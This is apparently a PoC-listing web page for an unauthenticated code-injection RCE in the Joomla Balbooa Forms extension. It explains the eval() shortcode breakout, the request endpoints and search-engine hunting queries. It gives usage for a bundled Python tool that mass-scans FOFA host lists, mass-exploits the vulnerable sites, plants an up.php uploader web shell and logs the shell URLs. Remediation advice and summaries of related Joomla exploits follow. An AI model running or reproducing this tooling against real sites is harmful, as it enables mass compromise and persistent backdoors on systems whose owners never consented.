CVE-2026-102425 — Joomla Balbooa Forms (com_baforms) Field Shortcode → Unauthenticated RCE
September 30, 2026 · 380 views
Balbooa Forms for Joomla 1.0.0–2.4.3.3: when a public form runs PHP-after-submission via eval(), field shortcodes are replaced with raw visitor input inside double-quoted PHP — classic ";breakout;// → RCE. CVSS 4.0 9.5 Critical (AT:P). Fixed in 2.4.3.4. Not CVE-2026-67364. Python PoC: version + public form detect, check/exploit, up.php drop, interactive + mass -j.
Description
Overview
CVE-2026-102425 — Balbooa Forms (com_baforms) for Joomla — unauthenticated remote code execution via field shortcode injection in optional PHP-after-submission actions (eval()).
| | |
|---|---|
| CNA | Joomla! Project (PUBLISHED 2026-09-29) |
| Affected | 1.0.0 – 2.4.3.3 |
| Fix | ≥ 2.4.3.4 |
| CWE | CWE-94 (Code Injection) |
| CVSS 4.0 | 9.5 Critical — CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| Finders | Łukasz Rybak, Sergiy Tryzhychynskyi |
PoC page: https://pocbit.org/pocs/cve-2026-102425
GitHub: murrez/CVE-2026-102425
CVE.org: CVE-2026-102425
NVD: CVE-2026-102425
Mechanism (Joomla CNA)
Administrators can attach PHP that runs after a public form submit. That PHP may contain form-field shortcodes. Before eval(), Balbooa replaces each shortcode with the raw submitted value (no escaping).
Exploitation requires all of:
- Extension < 2.4.3.4
- A public form with PHP-after-submission enabled
- PHP that embeds a field shortcode inside a double-quoted PHP string (e.g.
";echo POC;//)
AT:P (Attack Requirements: Present) — vulnerable configuration must exist; installing the component alone is insufficient.
This is not CVE-2026-67364 (URL [parameter=X] shortcode, fixed 2.4.3.2). Use --include-67364 only to test that separate issue.
Same release train: also patch CVE-2026-102424, CVE-2026-101127, CVE-2026-101112, CVE-2026-101126.
Bundled tool (Python 3)
Download cve-2026-102425.py from this page — it is a PoCbit bundle extractor. Run once to write poc.py, _engine.py, and up.php into the same folder.
pip install requests urllib3 colorama
python cve-2026-102425.py # writes poc.py, _engine.py, up.php
python poc.py --help
python poc.py --lab
python poc.py -u https://site.tld --check
python poc.py -u https://site.tld
python poc.py --check fofa_hosts.txt -t 20 # mass scan → hits.txt
python poc.py hits.txt -t 12 # mass exploit → exploited.txt
python _engine.py --help # full CLI / JSONL
| Mode | Behavior |
|------|----------|
| check | com_baforms, manifest version, affected_version, public_form_detected |
| check (default hits) | hits.txt only if affected and public form HTML loads |
| check --all-affected | All hosts on vulnerable version (noisy FOFA triage) |
| check --aggressive | More paths, loadAjaxForm ID scan |
| exploit | form.message submit + legacy tasks; double-quote breakout payloads |
| exploit --include-67364 | Adds URL-parameter shortcode attempts (67364 class) |
| exploit --aggressive | Full scrape + loadAjaxForm discovery |
| --lab | Local mock: double-quoted eval + field injection |
| mass | --list + -j → JSONL, hits.txt, exploited.txt |
On exploit, the PoC tries file_put_contents via field shortcode RCE to drop up.php (multipart uploader) under common Joomla paths, verifies POCBIT-102425-OK, and records shell_url in exploited.txt when web-visible.
HTTP surface (Balbooa 2.x / Joomla 4+)
| Step | Request |
|------|---------|
| Load form | GET index.php?option=com_baforms&task=form.loadAjaxForm&id=N |
| Submit | POST form action with task=form.message, form-id, fields |
| Note | Avoid format=json on front tasks on many J4 sites |
Legacy: view=form&form_id=N, form.submitForm.
Hunting (examples)
body="com_baforms" || body="/components/com_baforms/"
body="balbooa" && body="com_baforms"
index.php?option=com_baforms
Remediation
- Upgrade Balbooa Forms to 2.4.3.4+
- Remove PHP-after-submission actions that embed field or URL shortcodes until patched
- Enable reCAPTCHA on public submits
- Audit forms, admin users, and
images/baforms/uploads/
Legal and ethical use
Authorized security testing and patch validation only.
References
Related PoCs
Same platform, vendor, or tags — explore more write-ups on Pocbit.
- JoomlaCVE-2026-101110critical
CVE-2026-101110 — OrdaSoft Joomla Book Library (Free) Unauthenticated SQL Injection
OrdaSoft Book Library (Free) for Joomla ≤ 6.4.6: unauthenticated SQL injection (CWE-89) in books() via field/direction sort params — weak select substring blacklist + protectInjectionWithoutQuote, unquoted ORDER BY, session prime + `-- xselect` bypass (com_booklibrary). Fixed in 6.4.7+. CVSS 4.0 9.3 Critical. Python PoC: check, exploit, mass -j.
- JoomlaCVE-2026-76570critical
CVE-2026-76570 — Joomla JCTables (com_jctables) Unauthenticated SQL Read/Write via JSON API
Joomcode JCTables 1.0.0–1.20.0: unauthenticated front-end JSON tasks (getdatarow, getrow) concatenate table/column names into SQL with broken escaping — arbitrary DB read/write (CWE-89/CWE-862). CVSS 4.0 10.0 Critical (AT:N). Fixed in 1.21.1+. Python PoC proves user row read (POCBIT-76570-OK); check + exploit + mass -j.
- JoomlaCVE-2026-102427critical
CVE-2026-102427 — OrdaSoft Joomla CCK (com_os_cck) Unauthenticated Upload RCE
OrdaSoft OS CCK for Joomla 1.0.0–8.3.15: unauthenticated front-end task getContent reaches site/uploader.php — GIF/PHP polyglot passes magic-byte check while .php extension from attacker filename is written under web root (CWE-434). CVSS 4.0 10.0 Critical (AT:N). Fixed in 8.3.16+. Python PoC: check, exploit (POCBIT-102427-OK), mass + interactive.
- JoomlaCVE-2026-101108critical
CVE-2026-101108 — OrdaSoft Joomla Vehicle Manager (Free) Unauthenticated SQL Injection
OrdaSoft Vehicle Manager (Free) for Joomla ≤ 6.5.7: unauthenticated SQL injection (CWE-89) via order_field and order_direction concatenated into unquoted ORDER BY in site/vehiclemanager.php (com_vehiclemanager). Escaping is ineffective for sort keys. Public category, search, and all-vehicles views. Fixed in 6.5.8+. CVSS 4.0 9.3 Critical. Python PoC: check, error-based exploit, mass -j.